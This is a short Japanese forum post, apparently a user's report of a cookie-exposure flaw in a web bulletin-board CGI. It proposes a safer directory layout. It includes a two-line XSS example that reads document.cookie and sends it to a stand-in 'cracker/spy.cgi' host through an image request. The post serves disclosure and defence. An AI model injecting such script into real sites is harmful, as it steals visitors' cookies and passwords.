新規記事投稿

フォロー記事投稿

記事のキャンセル

　二ヶ月ほど前、cumberというハンドルで投稿した、"きゅんべる"です。

　うぇぶ会議室で、「これはちょっと問題かな？」と思えなくもないところを
見つけたので、報告したいと思います。


　いま、うぇぶ会議室の普通の設定では、

　ＣＧＩディレクトリ　−−−−　会議室１のディレクトリ
　　　　　　　　　　　　｜−−　会議室２のディレクトリ
　　　　　　　　　　　　｜−−　会議室３のディレクトリ

と言うようになってますよね。

　すると、この設定では、会議室の投稿ファイルからcookieをアクセスすると、
ＣＧＩで使ってるcookieつまり、ハンドルネームやキャンセルコードが見えて
しまうと思うんです。

　例えば、JavaScriptで、
       private_data = document.cookie;
　     <IMG SRC="http://www.hoge.ne.jp/cracker/spy.cgi?private_data">
などといったコードを投稿にし込んだ場合、アクセス者のパスワードなども盗め
てしまうと思うんです。

　ディレクトリー構成として、
　　　　　｜−−　ＣＧＩディレクトリ
　　　　　｜−−　会議室１のディレクトリ
　　　　　｜−−　会議室２のディレクトリ
　　　　　｜−−　会議室３のディレクトリ
とかを推奨したほうがいいと思うのですが、如何でしょう？